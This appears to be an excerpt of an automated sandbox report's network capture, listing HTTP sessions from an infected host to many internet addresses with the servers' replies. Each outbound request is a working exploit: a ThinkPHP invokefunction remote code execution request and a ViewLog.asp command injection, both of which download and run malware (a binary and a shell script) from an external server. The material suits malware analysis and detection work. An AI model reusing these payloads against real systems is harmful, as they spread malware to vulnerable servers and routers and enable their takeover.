Feb 25, 2024 19:02:20.263050079 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:20.524648905 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:02:20 GMT Date: Sun, 25 Feb 2024 18:02:20 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 31 34 30 26 23 34 36 3b 31 32 66 63 39 39 61 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.24161502.1708884140.12fc99a9</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.15	40882	95.56.81.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.154983044 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.423758030 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:02:19.424304962 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.15	59858	95.56.25.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.158292055 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.430762053 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:02:19.431154013 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.15	34578	95.164.112.148	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.237660885 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.414453030 CET	578	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:19 GMT Server: Apache/2.4.41 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 328 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 32 30 37 35 33 33 31 2e 73 74 61 72 6b 2d 69 6e 64 75 73 74 72 69 65 73 2e 73 6f 6c 75 74 69 6f 6e 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at vm2075331.stark-industries.solutions Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.15	47292	95.90.146.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.285109997 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.492537975 CET	337	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.2 Date: Sun, 25 Feb 2024 18:02:19 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.15	43494	95.165.132.141	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:19.343370914 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:19.567327023 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:19 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
Feb 25, 2024 19:02:20.092432976 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:19 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.15	53282	62.72.166.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:20.706551075 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.15	41524	94.121.142.20	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:20.802752018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.15	53724	62.29.86.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:20.812609911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.15	47646	94.123.101.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.030486107 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.15	52918	31.200.77.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.035878897 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.15	57128	95.216.165.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.694520950 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:21.891617060 CET	337	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.2 Date: Sun, 25 Feb 2024 18:02:21 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.15	34728	95.217.108.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.707509041 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:21.909085989 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Sun, 25 Feb 2024 18:02:21 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.15	50106	95.84.209.239	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.732094049 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:21.952599049 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:02:20 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.15	40610	95.101.143.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.771110058 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:23.110939026 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:23.364768028 CET	478	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Sun, 25 Feb 2024 18:02:23 GMT Date: Sun, 25 Feb 2024 18:02:23 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 38 66 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 34 33 26 23 34 36 3b 39 36 35 66 64 62 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.78f655f.1708884143.965fdb1</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.15	48418	95.54.80.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:21.811589003 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:22.637479067 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.15	47474	95.87.45.157	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:23.737771034 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:24.053765059 CET	101	IN	HTTP/1.1 404 Not Found Content-type: text/html Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.15	54048	95.213.202.26	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:27.181137085 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
